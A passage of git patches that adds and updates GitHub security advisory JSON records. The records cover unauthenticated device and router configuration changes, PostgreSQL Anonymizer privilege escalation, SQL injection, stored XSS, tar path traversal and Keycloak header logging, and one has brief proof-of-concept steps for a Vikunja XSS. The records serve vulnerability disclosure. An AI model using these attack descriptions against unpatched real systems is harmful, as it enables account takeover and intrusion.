a/advisories/unreviewed/2026/02/GHSA-r6ff-p4vx-28hv/GHSA-r6ff-p4vx-28hv.json b/advisories/unreviewed/2026/02/GHSA-r6ff-p4vx-28hv/GHSA-r6ff-p4vx-28hv.json new file mode 100644 index 0000000000000..a654967e8748e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r6ff-p4vx-28hv/GHSA-r6ff-p4vx-28hv.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6ff-p4vx-28hv", + "modified": "2026-02-11T18:31:29Z", + "published": "2026-02-11T18:31:29Z", + "aliases": [ + "CVE-2026-24789" + ], + "details": "An unprotected API endpoint allows an attacker to remotely change the device password without providing authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24789" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-041-02.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-041-02" + }, + { + "type": "WEB", + "url": "https://www.zlmcu.com/en/contact_us.htm" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T17:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r6q3-ww97-px52/GHSA-r6q3-ww97-px52.json b/advisories/unreviewed/2026/02/GHSA-r6q3-ww97-px52/GHSA-r6q3-ww97-px52.json new file mode 100644 index 0000000000000..7efe5bb737bfa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r6q3-ww97-px52/GHSA-r6q3-ww97-px52.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r6q3-ww97-px52", + "modified": "2026-02-11T18:31:31Z", + "published": "2026-02-11T18:31:31Z", + "aliases": [ + "CVE-2026-2360" + ], + "details": "PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a custom operator in the public schema and place malicious code in that operator. This operator will later be executed with superuser privileges when the extension is created. The risk is higher with PostgreSQL 14 or with instances upgraded from PostgreSQL 14 or a prior version. With PostgreSQL 15 and later, the creation permission on the public schema is revoked by default and this exploit can only be achieved if a superuser adds a new schema in her/his own search_path and grants the CREATE privilege on that schema to untrusted users, both actions being clearly discouraged by the PostgreSQL documentation. The problem is resolved in PostgreSQL Anonymizer 3.0.1 and further versions", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2360" + }, + { + "type": "WEB", + "url": "https://gitlab.com/dalibo/postgresql_anonymizer/-/blob/latest/NEWS.md" + }, + { + "type": "WEB", + "url": "https://gitlab.com/dalibo/postgresql_anonymizer/-/issues/616" + }, + { + "type": "WEB", + "url": "https://www.postgresql.org/docs/current/ddl-schemas.html#DDL-SCHEMAS-PATH" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8mq-23vx-xrgv/GHSA-r8mq-23vx-xrgv.json b/advisories/unreviewed/2026/02/GHSA-r8mq-23vx-xrgv/GHSA-r8mq-23vx-xrgv.json index f37f12fd35a58..0802c5dd26945 100644 --- a/advisories/unreviewed/2026/02/GHSA-r8mq-23vx-xrgv/GHSA-r8mq-23vx-xrgv.json +++ b/advisories/unreviewed/2026/02/GHSA-r8mq-23vx-xrgv/GHSA-r8mq-23vx-xrgv.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json b/advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json new file mode 100644 index 0000000000000..70f9f515b4aca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v66c-4xgf-59c7/GHSA-v66c-4xgf-59c7.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v66c-4xgf-59c7", + "modified": "2026-02-11T18:31:30Z", + "published": "2026-02-11T18:31:29Z", + "aliases": [ + "CVE-2025-65128" + ], + "details": "A missing authentication mechanism in the web management API components of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows unauthenticated attackers on the local network to modify router and network configurations. By invoking operations whose names end with \"*_nocommit\" and supplying the parameters expected by the invoked function, an attacker can change configuration data, including SSID, Wi-Fi credentials, and administrative passwords, without authentication or an existing session.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65128" + }, + { + "type": "WEB", + "url": "https://neutsec.io/advisories/cve-2025-65128" + }, + { + "type": "WEB", + "url": "https://www.zbtwifi.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json b/advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json index e705519ec1c2a..7d1588f39e4dd 100644 --- a/advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json +++ b/advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vm49-qx2v-g672", - "modified": "2026-02-11T06:30:41Z", + "modified": "2026-02-11T18:31:28Z", "published": "2026-02-11T06:30:41Z", "aliases": [ "CVE-2025-15400" ], "details": "The Pix para Woocommerce WordPress plugin through 2.13.3 allows any authenticated user to trigger AJAX actions that reset payment gateway configuration options without capability or nonce checks. This permits any authenticated users, such as subscribers to clear API credentials and webhook status, causing persistent disruption of OpenPix payment functionality.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T06:15:47Z" diff --git a/advisories/unreviewed/2026/02/GHSA-x2gm-g5r6-83jw/GHSA-x2gm-g5r6-83jw.json b/advisories/unreviewed/2026/02/GHSA-x2gm-g5r6-83jw/GHSA-x2gm-g5r6-83jw.json index 3359cb801c635..0c353bdb48ad9 100644 --- a/advisories/unreviewed/2026/02/GHSA-x2gm-g5r6-83jw/GHSA-x2gm-g5r6-83jw.json +++ b/advisories/unreviewed/2026/02/GHSA-x2gm-g5r6-83jw/GHSA-x2gm-g5r6-83jw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-x2gm-g5r6-83jw", - "modified": "2026-02-03T18:30:47Z", + "modified": "2026-02-11T18:31:25Z", "published": "2026-02-03T18:30:47Z", "aliases": [ "CVE-2025-70311" ], "details": "JEEWMS 1.0 is vulnerable to SQL Injection. Attackers can inject malicious SQL statements through the id1 and id2 parameters in the /systemControl.do interface for attack.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-03T18:16:17Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xcpc-ffvj-qvhw/GHSA-xcpc-ffvj-qvhw.json b/advisories/unreviewed/2026/02/GHSA-xcpc-ffvj-qvhw/GHSA-xcpc-ffvj-qvhw.json new file mode 100644 index 0000000000000..550b2a17d07d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xcpc-ffvj-qvhw/GHSA-xcpc-ffvj-qvhw.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcpc-ffvj-qvhw", + "modified": "2026-02-11T18:31:31Z", + "published": "2026-02-11T18:31:31Z", + "aliases": [ + "CVE-2026-2361" + ], + "details": "PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a temporary view based on a function containing malicious code. When the anon.get_tablesample_ratio function is then called, the malicious code is executed with superuser privileges. This privilege elevation can be exploited by users having the CREATE privilege in PostgreSQL 15 and later. The risk is higher with PostgreSQL 14 or with instances upgraded from PostgreSQL 14 or a prior version because the creation permission on the public schema is granted by default. The problem is resolved in PostgreSQL Anonymizer 3.0.1 and further versions", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2361" + }, + { + "type": "WEB", + "url": "https://gitlab.com/dalibo/postgresql_anonymizer/-/blob/latest/NEWS.md" + }, + { + "type": "WEB", + "url": "https://gitlab.com/dalibo/postgresql_anonymizer/-/issues/617" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xrh7-29mh-fp98/GHSA-xrh7-29mh-fp98.json b/advisories/unreviewed/2026/02/GHSA-xrh7-29mh-fp98/GHSA-xrh7-29mh-fp98.json index abed4a8950f0f..f4969b6bf2b54 100644 --- a/advisories/unreviewed/2026/02/GHSA-xrh7-29mh-fp98/GHSA-xrh7-29mh-fp98.json +++ b/advisories/unreviewed/2026/02/GHSA-xrh7-29mh-fp98/GHSA-xrh7-29mh-fp98.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xrh7-29mh-fp98", - "modified": "2026-02-04T15:30:29Z", + "modified": "2026-02-11T18:31:25Z", "published": "2026-02-04T15:30:29Z", "aliases": [ "CVE-2025-69618" ], "details": "An arbitrary file overwrite vulnerability in the file import process of Tarot, Astro & Healing v11.4.0 allows attackers to overwrite critical internal files, potentially leading to arbitrary code execution or exposure of sensitive information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-04T15:16:13Z" From 115a304aeac46fc337a50465903065adc58c4ae0 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 18:40:05 +0000 Subject: [PATCH 011/215] Publish Advisories GHSA-37qj-frw5-hhjh GHSA-9278-6hcj-2p4j GHSA-m4g2-2q66-vc9v --- .../GHSA-37qj-frw5-hhjh.json | 4 +- .../GHSA-9278-6hcj-2p4j.json | 39 +++++++++-- .../GHSA-m4g2-2q66-vc9v.json | 65 +++++++++++++++++++ 3 files changed, 101 insertions(+), 7 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json (62%) create mode 100644 advisories/github-reviewed/2026/02/GHSA-m4g2-2q66-vc9v/GHSA-m4g2-2q66-vc9v.json diff --git a/advisories/github-reviewed/2026/01/GHSA-37qj-frw5-hhjh/GHSA-37qj-frw5-hhjh.json b/advisories/github-reviewed/2026/01/GHSA-37qj-frw5-hhjh/GHSA-37qj-frw5-hhjh.json index 544d9ec3c2eaf..9b6376aee0688 100644 --- a/advisories/github-reviewed/2026/01/GHSA-37qj-frw5-hhjh/GHSA-37qj-frw5-hhjh.json +++ b/advisories/github-reviewed/2026/01/GHSA-37qj-frw5-hhjh/GHSA-37qj-frw5-hhjh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-37qj-frw5-hhjh", - "modified": "2026-01-30T20:10:14Z", + "modified": "2026-02-11T18:38:19Z", "published": "2026-01-30T20:10:14Z", "aliases": [ "CVE-2026-25128" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.3.6" + "introduced": "5.0.9" }, { "fixed": "5.3.4" diff --git a/advisories/unreviewed/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json b/advisories/github-reviewed/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json similarity index 62% rename from advisories/unreviewed/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json rename to advisories/github-reviewed/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json index 010c8817c5b85..c6faa99f21a01 100644 --- a/advisories/unreviewed/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json +++ b/advisories/github-reviewed/2026/02/GHSA-9278-6hcj-2p4j/GHSA-9278-6hcj-2p4j.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-9278-6hcj-2p4j", - "modified": "2026-02-11T15:30:27Z", + "modified": "2026-02-11T18:39:09Z", "published": "2026-02-11T15:30:27Z", "aliases": [ "CVE-2019-25317" ], + "summary": "Kimai 2 vulnerable to persistent cross-site scripting in the timesheet descriptions", "details": "Kimai 2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into timesheet descriptions. Attackers can insert SVG-based XSS payloads in the description field to execute arbitrary JavaScript when the page is loaded and viewed by other users.", "severity": [ { @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "kimai/kimai" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -27,10 +48,18 @@ "type": "WEB", "url": "https://github.com/kevinpapst/kimai2/pull/962" }, + { + "type": "WEB", + "url": "https://github.com/kimai/kimai/commit/a0e8aa3a435717187fb12210242dab1b7c97ff3f" + }, { "type": "WEB", "url": "https://github.com/kevinpapst/kimai2" }, + { + "type": "PACKAGE", + "url": "https://github.com/kimai/kimai" + }, { "type": "WEB", "url": "https://www.exploit-db.com/exploits/47286" @@ -45,8 +74,8 @@ "CWE-79" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T18:39:09Z", "nvd_published_at": "2026-02-11T15:16:10Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m4g2-2q66-vc9v/GHSA-m4g2-2q66-vc9v.json b/advisories/github-reviewed/2026/02/GHSA-m4g2-2q66-vc9v/GHSA-m4g2-2q66-vc9v.json new file mode 100644 index 0000000000000..29fc506b3faa3 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-m4g2-2q66-vc9v/GHSA-m4g2-2q66-vc9v.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m4g2-2q66-vc9v", + "modified": "2026-02-11T18:39:34Z", + "published": "2026-02-11T18:39:34Z", + "aliases": [ + "CVE-2026-25935" + ], + "summary": "Vikunja Vulnerable to XSS Via Task Preview", + "details": "### Summary\nThe task preview component creates a unparented div. The div's `innerHtml` is set to the unescaped description of the task\n\n### Details\nIn the `TaskGlanceTooltip.vue` it temporarily creates a div and sets the `innerHtml` to the description [here](https://github.com/go-vikunja/vikunja/blob/cdca79032526966cb248b72bddcf2a0f888c8a8f/frontend/src/components/tasks/partials/TaskGlanceTooltip.vue#L118). Since there is no escaping on either the server or client side, a malicious user can share a project, create a malicious task, and cause an XSS on hover.\n\n### PoC\n1. Create a project\n2. Create a task with any description\n3. Use the api to update the task with a description containing unescaped HTML (ex: ``\n4. Share the project with any permission level\n5. Send malicious project to user and ask them to view task\n\n### Impact\nAny user on an instance can cause an XSS on another", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "code.vikunja.io/api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.24.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-m4g2-2q66-vc9v" + }, + { + "type": "WEB", + "url": "https://github.com/go-vikunja/vikunja/commit/dd0b82f00a8c9ded1c19a1e643a197c514be6d37" + }, + { + "type": "PACKAGE", + "url": "https://github.com/go-vikunja/vikunja" + }, + { + "type": "WEB", + "url": "https://github.com/go-vikunja/vikunja/releases/tag/v1.1.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T18:39:34Z", + "nvd_published_at": null + } +} \ No newline at end of file From 5497901a1dd7c5d6cb47c77b88d18de2dbaa957c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 18:42:38 +0000 Subject: [PATCH 012/215] Publish Advisories GHSA-5r63-q8hg-p8qx GHSA-gcpq-mrgg-v5f3 --- .../GHSA-5r63-q8hg-p8qx.json | 9 +++++-- .../GHSA-gcpq-mrgg-v5f3.json | 25 +++++++++++++++---- 2 files changed, 27 insertions(+), 7 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json (73%) diff --git a/advisories/github-reviewed/2026/02/GHSA-5r63-q8hg-p8qx/GHSA-5r63-q8hg-p8qx.json b/advisories/github-reviewed/2026/02/GHSA-5r63-q8hg-p8qx/GHSA-5r63-q8hg-p8qx.json index b33da77b77767..c8cd94c822f9a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5r63-q8hg-p8qx/GHSA-5r63-q8hg-p8qx.json +++ b/advisories/github-reviewed/2026/02/GHSA-5r63-q8hg-p8qx/GHSA-5r63-q8hg-p8qx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5r63-q8hg-p8qx", - "modified": "2026-02-04T19:21:14Z", + "modified": "2026-02-11T18:40:08Z", "published": "2026-02-03T18:30:47Z", "aliases": [ "CVE-2025-69983" @@ -9,6 +9,10 @@ "summary": "FUXA allows Remote Code Execution (RCE) via the project import functionality.", "details": "FUXA v1.2.7 allows Remote Code Execution (RCE) via the project import functionality. The application does not properly sanitize or sandbox user-supplied scripts within imported project files. An attacker can upload a malicious project containing system commands, leading to full system compromise.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" @@ -51,7 +55,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-78" + "CWE-78", + "CWE-94" ], "severity": "HIGH", "github_reviewed": true, diff --git a/advisories/unreviewed/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json b/advisories/github-reviewed/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json similarity index 73% rename from advisories/unreviewed/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json rename to advisories/github-reviewed/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json index 6ca2d5d444e6c..2f86d4a7debcf 100644 --- a/advisories/unreviewed/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json +++ b/advisories/github-reviewed/2026/02/GHSA-gcpq-mrgg-v5f3/GHSA-gcpq-mrgg-v5f3.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-gcpq-mrgg-v5f3", - "modified": "2026-02-11T15:30:27Z", + "modified": "2026-02-11T18:39:48Z", "published": "2026-02-11T15:30:27Z", "aliases": [ "CVE-2018-25157" ], + "summary": "Phraseanet vulnerable to stored cross-site scripting through crafted file names", "details": "Phraseanet 4.0.3 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts through crafted file names during document uploads. Attackers can upload files with embedded SVG scripts that execute in the browser, potentially stealing cookies or redirecting users when the file is viewed.", "severity": [ { @@ -14,15 +15,29 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "phraseanet/phraseanet" + }, + "versions": [ + "4.0.3" + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25157" }, + { + "type": "PACKAGE", + "url": "https://github.com/alchemy-fr/Phraseanet" + }, { "type": "WEB", "url": "https://www.exploit-db.com/exploits/46935" @@ -45,8 +60,8 @@ "CWE-79" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T18:39:48Z", "nvd_published_at": "2026-02-11T15:16:07Z" } } \ No newline at end of file From 5b043cc830a548543cf896f6d142652e66df3771 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 18:58:04 +0000 Subject: [PATCH 013/215] Publish GHSA-92fh-27vv-894w --- .../GHSA-92fh-27vv-894w.json | 44 +++++++++++++++---- 1 file changed, 36 insertions(+), 8 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json (53%) diff --git a/advisories/unreviewed/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json b/advisories/github-reviewed/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json similarity index 53% rename from advisories/unreviewed/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json rename to advisories/github-reviewed/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json index e4c6f431a411c..12c33199909b2 100644 --- a/advisories/unreviewed/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json +++ b/advisories/github-reviewed/2026/02/GHSA-92fh-27vv-894w/GHSA-92fh-27vv-894w.json @@ -1,14 +1,40 @@ { "schema_version": "1.4.0", "id": "GHSA-92fh-27vv-894w", - "modified": "2026-02-11T18:31:30Z", + "modified": "2026-02-11T18:56:22Z", "published": "2026-02-11T18:31:30Z", "aliases": [ "CVE-2025-69874" ], + "summary": "nanotar is vulnerable to path traversal in parseTar() and parseTarGzip()", "details": "nanotar through 0.2.0 has a path traversal vulnerability in parseTar() and parseTarGzip() that allows remote attackers to write arbitrary files outside the intended extraction directory via a crafted tar archive containing path traversal sequence.", - "severity": [], - "affected": [], + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "nanotar" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.2.0" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -19,7 +45,7 @@ "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69874-nanotar-Path-Traversal.md" }, { - "type": "WEB", + "type": "PACKAGE", "url": "https://github.com/unjs/nanotar" }, { @@ -28,10 +54,12 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-11T18:56:22Z", "nvd_published_at": "2026-02-11T18:16:05Z" } } \ No newline at end of file From 8289badd55f36b1ab55062bef29b7eaaa0c214f9 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 11 Feb 2026 19:11:12 +0000 Subject: [PATCH 014/215] Publish Advisories GHSA-gv3v-2cpp-3pmq GHSA-x9vf-53q3-cvx6 GHSA-x9vf-53q3-cvx6 --- .../GHSA-gv3v-2cpp-3pmq.json | 37 +++++++- .../GHSA-x9vf-53q3-cvx6.json | 84 +++++++++++++++++++ .../GHSA-x9vf-53q3-cvx6.json | 41 --------- 3 files changed, 117 insertions(+), 45 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-gv3v-2cpp-3pmq/GHSA-gv3v-2cpp-3pmq.json (60%) create mode 100644 advisories/github-reviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-x9vf-53q3-cvx6/GHSA-x9vf-53q3-cvx6.json diff --git a/advisories/unreviewed/2026/02/GHSA-gv3v-2cpp-3pmq/GHSA-gv3v-2cpp-3pmq.json b/advisories/github-reviewed/2026/02/GHSA-gv3v-2cpp-3pmq/GHSA-gv3v-2cpp-3pmq.json similarity index 60% rename from advisories/unreviewed/2026/02/GHSA-gv3v-2cpp-3pmq/GHSA-gv3v-2cpp-3pmq.json rename to advisories/github-reviewed/2026/02/GHSA-gv3v-2cpp-3pmq/GHSA-gv3v-2cpp-3pmq.json index d1e0d9089341c..796fe74f25942 100644 --- a/advisories/unreviewed/2026/02/GHSA-gv3v-2cpp-3pmq/GHSA-gv3v-2cpp-3pmq.json +++ b/advisories/github-reviewed/2026/02/GHSA-gv3v-2cpp-3pmq/GHSA-gv3v-2cpp-3pmq.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-gv3v-2cpp-3pmq", - "modified": "2026-02-10T12:30:28Z", + "modified": "2026-02-11T19:08:55Z", "published": "2026-02-10T12:30:28Z", "aliases": [ "CVE-2025-11537" ], + "summary": "Keycloak logs sensitive headers", "details": "A flaw was found in Keycloak. When the logging format is configured to a verbose, user-supplied pattern (such as the pre-defined 'long' pattern), sensitive headers including Authorization and Cookie are disclosed to the logs in cleartext. An attacker with read access to the log files can extract these credentials (e.g., bearer tokens, session cookies) and use them to impersonate users, leading to a full account compromise.", "severity": [ { @@ -13,12 +14,36 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.keycloak:keycloak-quarkus-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "26.6.0" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11537" }, + { + "type": "WEB", + "url": "https://github.com/keycloak/keycloak/commit/137a35c1109ff43a305f26264978a3ea21452373" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-11537" @@ -26,6 